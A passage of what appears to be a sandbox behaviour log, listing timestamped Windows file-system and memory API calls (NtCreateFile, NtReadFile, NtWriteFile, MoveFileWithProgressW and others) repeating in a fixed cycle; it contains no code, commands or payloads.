17:42:02,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,101", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,121", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,142", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,142", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,152", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,152", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,162", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,162", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,172", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,172", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,182", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,182", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,192", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,192", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,202", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,202", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,212", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,212", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,222", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,222", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,232", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,232", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,242", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,242", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,252", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,262", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,262", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,272", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,272", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,302", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,342", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,362", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,362", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,372", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,382", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,382", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,382", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,382", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,412", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,442", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,472", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,482", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,562", "api": 